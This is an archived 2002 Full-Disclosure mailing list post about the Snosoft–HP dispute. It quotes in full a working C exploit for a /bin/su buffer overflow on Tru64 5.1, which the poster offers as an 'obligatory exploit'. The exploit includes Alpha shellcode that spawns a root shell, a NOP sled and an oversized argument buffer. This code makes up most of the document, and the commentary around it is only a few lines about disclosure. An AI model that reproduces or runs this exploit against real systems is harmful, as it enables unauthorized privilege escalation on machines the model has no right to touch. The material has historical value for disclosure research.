| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: simon at snosoft.com (ATD)
Subject: OT: Snosoft vs HP
What is even more interesting is that this issue has been known for
quite a while, yet no one did anything about it.
Adriel
On Wed, 2002-07-31 at 12:22, Len Rose wrote:
>
> It's interesting to note that the exploit was removed from
> SecurityFocus' site. I wonder if HP is going to demand people
> remove it from all archives everywhere?
>
> Obligatory exploit:
>
> /*
> /bin/su tru64 5.1
> works with non-exec stack enabled
>
> stripey is the man
>
> developed at http://www.snosoft.com in the cerebrum labs
>
> phased
> phased at mail.ru
> */
>
> #include <stdio.h>
> #include <stdlib.h>
> #include <string.h>
> #include <unistd.h>
>
> char shellcode[]=
> "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> "\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
> "\x12\x14\x02\x42" /* addq $16,16,$18 */
> "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> "\x12\x94\x09\x42" /* addq $16,76,$18 */
> "\xfc\xff\x32\xb2" /* stl $17,-4($18) */
> "\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
> "\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
> "\xfc\xff\x30\xb2" /* stl $17,-4($16) */
> "\xf7\xff\x1f\xd2" /* bsr $16,-32 */
> "\x10\x04\xff\x47" /* clr $16 */
> "\x11\x14\xe3\x43" /* addq $31,24,$17 */
> "\x20\x35\x20\x42" /* subq $17,1,$0 */
> "\xff\xff\xff\xff" /* callsys ( disguised ) */
> "\x30\x15\xd9\x43" /* subq $30,200,$16 */
> "\x31\x15\xd8\x43" /* subq $30,192,$17 */
> "\x12\x04\xff\x47" /* clr $18 */
> "\x40\xff\x1e\xb6" /* stq $16,-192($30) */
> "\x48\xff\xfe\xb7" /* stq $31,-184($30) */
> "\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
> "\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
> "\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
> "\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
> "\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
> "\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
> "\x38\xff\x7e\xb2" /* stl $19,-200($30) */
> "\x13\x94\xe7\x43" /* addq $31,60,$19 */
> "\x20\x35\x60\x42" /* subq $19,1,$0 */
> "\xff\xff\xff\xff"; /* callsys ( disguised ) */
>
> /* shellcode by Taeho Oh */
>
> main(int argc, char *argv[]) {
> int i, j;
> char buffer[8239];
> char payload[15200];
> char nop[] = "\x1f\x04\xff\x47";
>
> bzero(&buffer, 8239);
> bzero(&payload, 15200);
>
> for (i=0;i<8233;i++)
> buffer[i] = 0x41;
>
> /* 0x140010401 */
>
> buffer[i++] = 0x01;
> buffer[i++] = 0x04;
> buffer[i++] = 0x01;
> buffer[i++] = 0x40;
> buffer[i++] = 0x01;
>
> for (i=0;i<15000;) {
> for(j=0;j<4;j++) {
> payload[i++] = nop[j];
> }
> }
>
> for (i=i,j=0;j<sizeof(shellcode);i++,j++)
> payload[i] = shellcode[j];
>
> printf("/bin/su by phased\n");
> printf("payload %db\n", strlen(payload));
> printf("buffer %db\n", strlen(buffer));
>
> execl("/usr/bin/su", "su", buffer, payload, 0);
>
> }
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Full-Disclosure@...ts.netsys.com
> http://lists.netsys.com/mailman/listinfo/full-disclosure
>
--
-------------------------------------------------------
Secure Network Operations, Inc.| http://www.snosoft.com
Cerebrum Project | cerebrum@...soft.com
Strategic Reconnaissance Team | recon@...soft.com
-------------------------------------------------------
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 232 bytes
Desc: This is a digitally signed message part
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020731/95529729/attachment.bin
Powered by blists - more mailing lists